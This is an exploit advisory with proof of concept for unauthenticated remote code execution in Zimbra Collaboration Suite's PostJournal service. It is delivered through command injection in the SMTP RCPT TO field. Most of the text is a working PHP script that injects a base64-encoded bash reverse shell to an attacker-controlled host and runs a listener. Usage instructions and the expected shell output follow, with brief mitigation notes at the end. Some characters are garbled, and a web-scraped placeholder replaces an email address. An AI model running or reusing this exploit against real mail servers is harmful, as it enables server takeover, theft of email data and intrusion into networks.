Zimbra Collaboration Suite Postjournal 10.0.x Remote Code Execution

=============================================================================================================================================
| # Title Zimbra Collaboration Suite Postjournal 10.0.x Remote Code Execution

=============================================================================================================================================
| # Title : Zimbra Collaboration Suite Postjournal 10.0.x before 10.0.9 Unauthenticated RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.zimbra.com/ |
=============================================================================================================================================

POC :

1. Overview
-----------
A critical vulnerability exists in the Zimbra Collaboration Suite (ZCS) PostJournal service that allows attackers to execute arbitrary system commands without authentication.
The vulnerability is triggered through SMTP injection using a malicious RCPT TO parameter. This exploit provides full remote command execution (RCE) as the Zimbra user, enabling an attacker to gain a reverse shell.

The root cause is improper sanitization of user-controlled email fields inside the PostJournal processing mechanism.

----------------------------------------------

2. Vulnerability Details
------------------------
The PostJournal service processes incoming emails and interacts with external components. Due to a command injection flaw in the way Zimbra handles the RCPT TO address, attackers can inject shell commands using syntax such as:

RCPT TO:<aabbb$(COMMAND)@domain.com>

Zimbra interprets the `$()` expression as a shell command and executes it under the mail server context.

This leads to full RCE.

----------------------------------------------

3. Requirements
---------------
? ZCS installation (vulnerable version)
? SMTP access reachable externally
? No authentication required
? Attacker?s listener ready to receive reverse shell

----------------------------------------------

4. Proof of Concept (PoC)
-------------------------
The exploit uses standard SMTP commands:

EHLO localhost
MAIL FROM:<This email address is being protected from spambots. You need JavaScript enabled to view it.>
RCPT TO:<aabbb$(payload)@test.com>
DATA
Test
.
QUIT

The payload is a Base64?encoded reverse shell executed via:

echo BASE64 | base64 -d | bash

----------------------------------------------

5. PHP Exploit Code
-------------------------------------------
The following PHP PoC sends the exploit to Zimbra and creates a built?in TCP listener without using `pcntl_fork()`:

<?php
set_time_limit(0);
error_reporting(E_ALL);
ob_implicit_flush(true);

class SMTPExploit {
private $target;
private $port;
private $lhost;
private $lport;
private $mail_from;
private $rcpt_to;
private $sock;
private $command;

public function __construct($target, $port, $lhost, $lport) {
$this->target = $target;
$this->port = $port;
$this->lhost = $lhost;
$this->lport = $lport;

$this->mail_from = $this->random_email();
$this->rcpt_to = $this->random_email();
$this->command = $this->generate_b64_shell();
}

private function random_email() {
return substr(md5(rand()), 0, 8)."@test.com";
}

private function generate_b64_shell() {
$cmd = "/bin/bash -i 5<> /dev/tcp/{$this->lhost}/{$this->lport} 0<&5 1>&5 2>&5";
$b64 = base64_encode($cmd);
return "echo ${b64}|base64 -d|bash";
}

private function injected_rcpt() {
return "aabbb\$({$this->command})@{$this->rcpt_to}";
}

private function connect() {
$this->sock = fsockopen($this->target, $this->port, $e, $s, 10);
if (!$this->sock) die("[!] Cannot connect to SMTP server\n");
fgets($this->sock, 4096);
}

private function send($cmd) {
fwrite($this->sock, $cmd."\r\n");
return fgets($this->sock, 4096);
}

public function run() {
echo "[*] Connecting to SMTP...\n";
$this->connect();

$this->send("EHLO localhost");
$this->send("MAIL FROM:<{$this->mail_from}>");

$inj = $this->injected_rcpt();
$this->send("RCPT TO:<{$inj}>");

$this->send("DATA");
fwrite($this->sock, "Test\r\n.\r\n");

$this->send("QUIT");
fclose($this->sock);

echo "[+] Exploit Sent.\n";
}
}

class Listener {
private $host;
private $port;

public function __construct($h, $p) {
$this->host = $h;
$this->port = $p;
}

public function start() {
echo "[*] Starting listener on {$this->host}:{$this->port}\n";

$sock = stream_socket_server("tcp://{$this->host}:{$this->port}", $e, $s);
if (!$sock) die("[!] Cannot start listener\n");

while (true) {
$client = @stream_socket_accept($sock, 1);
if ($client) {
echo "[+] Connection received\n";
$this->interactive($client);
fclose($client);
}
}
}

private function interactive($client) {
fwrite($client, "Connected!\n> ");

while (!feof($client)) {
$cmd = trim(fgets($client));

if ($cmd === "exit") break;

$out = shell_exec($cmd);
fwrite($client, $out . "\n> ");
}
}
}

$target = $argv[1] ?? "127.0.0.1";
$port = $argv[2] ?? 25;
$lhost = $argv[3] ?? "0.0.0.0";
$lport = $argv[4] ?? 4444;

echo "[*] Launching listener thread...\n";

$listener = new Listener($lhost, $lport);

$listener_running = false;
$exploit_sent = false;

while (true) {

if (!$listener_running) {
echo "[*] Listener online...\n";
$listener_running = true;
$listener->start();
}

if (!$exploit_sent) {
echo "[*] Sending exploit...\n";
$e = new SMTPExploit($target, $port, $lhost, $lport);
$e->run();
$exploit_sent = true;
}

usleep(10000);
}

?>

-------------------------
How to Run the Exploit
-------------------------

### **1. Save the script**
Save the code as:

zimbra_rce.php

### **2. Start it from terminal**
Windows example:

php zimbra_rce.php 192.168.1.50 25 192.168.1.10 4444

Linux example:

php zimbra_rce.php mail.example.com 25 attacker-ip 4444

### **Arguments format:**

| Argument | Description |
|---------|-------------|
| 1 | Target Zimbra SMTP IP |
| 2 | SMTP port (default 25) |
| 3 | Attacker listener IP |
| 4 | Listener port |

### **3. Wait for Shell**
If the server is vulnerable, you will see:

[*] Listener online...
[*] Sending exploit...
[+] Exploit Sent.
[+] Connection received
Connected!
>

Now you have a remote shell.
----------------------------------------------

6. Impact
---------
? Full remote command execution
? Full server compromise possible
? Email data exposure
? Privilege escalation (depending on system configuration)
? Lateral movement inside the network

----------------------------------------------

7. Mitigation
-------------
Until patches are applied:

? Block external SMTP access to PostJournal component
? Apply strict sanitization rules for RCPT field
? Monitor suspicious SMTP activity
? Restrict Zimbra service user privileges

----------------------------------------------

8. Conclusion
-------------
This vulnerability presents a severe risk and must be mitigated immediately.
The exploit demonstrates how a simple SMTP injection can lead to full RCE, highlighting the need for strict input validation in email?processing systems.




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================